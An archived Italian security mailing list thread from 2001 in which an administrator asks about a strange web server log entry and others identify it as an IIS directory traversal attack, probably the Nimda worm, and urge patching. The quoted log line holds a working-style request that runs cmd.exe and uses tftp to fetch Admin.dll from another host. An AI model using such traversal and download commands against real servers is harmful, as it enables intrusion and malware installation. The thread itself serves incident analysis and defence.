[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Settembre 2001 ml@sikurezza.org Soggetto: Re: Un saluto e domandina Mittente: fabio Data: 26 Sep 2001 17:09:00 -0000
At 18.51 24/09/2001 +0000, you wrote: >>Ciao a tutti, trovo ultimamente, sempre piu' spesso nei log, questa riga: >> >>oops_id oops_url oops_ip oops_date oops_durl >>902190 151.4.121.7 24/09/2001 14.45.00 >>#?404;http://www/scripts/..S5c../winnt/system32/cmd.exe?/c tftp -i >>151.4.121.11 GET Admin.dll e:\Admin.dll >> >>che devo fare? il signor 151.4.121.7, esiste, è vero e posso torturarlo? >>grazie a chi mi da una rispostina >> >>Ciao >>Ste >Ciao >allora quella stringa permette di eseguire comandi su IIS e' un bug non >ancora patchato a quanto ne so e sfrutta la codifica dei caratteri per >effettuare il directory traversal e tramite cmd.exe, arrivare quindi a >poter eseguire comandi sul server. >Tftp e' un clien ftp batch (da linea di comando) che di solito e' usato x >uploadare file sul'IIS bucato. >Ora non ho la sintassi ma di solito viene usato un server tftp da cui >prendere i file...ora non so bene come si propaga NIMDA ma penso potrebbe >essere quel worm....altrimenti e' qualcuno che ci ha provato manualmente >:) ciauzzz Ultimo !!! (KOBA perdomani) Un saluto veloce alla lista (e da molto che seguo direi dall'inizio... ma non avevo mai contribuito) Un po di chiarezza Nimda attacca sia via http che posta che share di rete (in soldoni o vi arriva via posta o ve lo pigliate navigando via web o vi trovate i file sul pc...direi che ce n'e per tutti i gusti ) La figata pazzesca di questo e' che se te hai una ver di IE inferiore (mi sembra) alla 5.01 sp1 te lo cucchi semplicemente navigando un sito infetto.quindi upgradare gente upgradare... per quanto riguarda gli IIS Non mi sembra sfrutti grosse novita prova la code red e qualche altra simpatica "features" che cmq dovrebbe essere gia tappata da un pezzo (se non lo fate siete come minimo incoscienti...) terzo una volta entrato cerca di copiarsi sotto forma di .eml e .non_mi_ricordo_cosa su tutte le share presenti nelle vostre risorse di rete .... ciaof ps aggiungo in coda un po di link http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html http://www.europe.f-secure.com/v-descs/nimda.shtml http://www.cert.org/advisories/CA-2001-26.html ps2 sarebbe interessante sapere quante reti sono state infettate ...qua si parlava di provider fermi, banche .... ecc ecc ... ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005